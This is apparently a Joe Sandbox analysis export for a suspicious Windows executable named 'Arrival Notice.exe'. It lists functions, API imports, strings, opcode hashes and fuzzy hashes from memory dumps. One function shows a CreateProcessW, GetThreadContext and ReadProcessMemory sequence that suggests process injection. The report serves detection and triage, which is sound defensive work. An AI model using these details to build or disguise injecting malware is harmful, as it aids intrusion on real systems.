Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9

Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004321C1
__fread_nolock.LIBCMT ref: 004321D7

Strings

EA06, xrefs: 0043220A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0

Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
C:\Users\user\Desktop\Arrival Notice.exe, xrefs: 00410107

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _strcat
String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Arrival Notice.exe
API String ID: 1765576173-3025707027
Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6

Function 00431E1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C

Strings

aut, xrefs: 00431E40

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9

Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86

Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00414B86
__read.LIBCMT ref: 00414BE9
__filbuf.LIBCMT ref: 00414C05

Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 1794320848-0
Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59

Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
TerminateProcess.KERNEL32(00000000), ref: 004753CE

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96

Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043214B

Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600

_malloc.LIBCMT ref: 0043215D
_malloc.LIBCMT ref: 0043216F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC

Function 00431DDB Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
CloseHandle.KERNEL32(00000000), ref: 00431E14

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8

Function 004320F8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043210A

Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770

_free.LIBCMT ref: 0043211D
_free.LIBCMT ref: 00432130

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9

Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 004678F7

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

GetLastError.KERNEL32(00000000,00000000), ref: 004679C7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ErrorLast__wsplitpath_malloc
String ID:
API String ID: 4163294574-0
Opcode ID: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
Opcode Fuzzy Hash: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97

Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747

_strcat.LIBCMT ref: 0040F786

Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
String ID:
API String ID: 3199840319-0
Opcode ID: 1ce8d8ec4429337c60193f8b2422588a912adf836a7dc8a25abf522012a1f6f4
Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
Opcode Fuzzy Hash: 1ce8d8ec4429337c60193f8b2422588a912adf836a7dc8a25abf522012a1f6f4
Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A

Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
FreeLibrary.KERNEL32(?), ref: 0040D78E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: FreeInfoLibraryParametersSystem
String ID:
API String ID: 3403648963-0
Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A

Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
Opcode Fuzzy Hash: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C

Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77

__lock_file.LIBCMT ref: 00414A8D

Part of subcall function 00415471: __lock.LIBCMT ref: 00415496

__fclose_nolock.LIBCMT ref: 00414A98

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D

Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00415012
__ftell_nolock.LIBCMT ref: 0041501F

Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59

Function 03C612E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03C61AA3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03C61B39
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03C61B5B

Memory Dump Source

Source File: 00000000.00000002.1278608587.0000000003C60000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c60000_Arrival Notice.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: f684924efc7d2f641770e11033f9e36bcc8de36920785b52566c0d6027913c77
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 5F12EE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 0046F993 Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

APIs

Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1

_memmove.LIBCMT ref: 0046FAF1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: 87f94661207c863af8b1fc4af8a0b29539e0d831b94eba20ea055568682fb20f
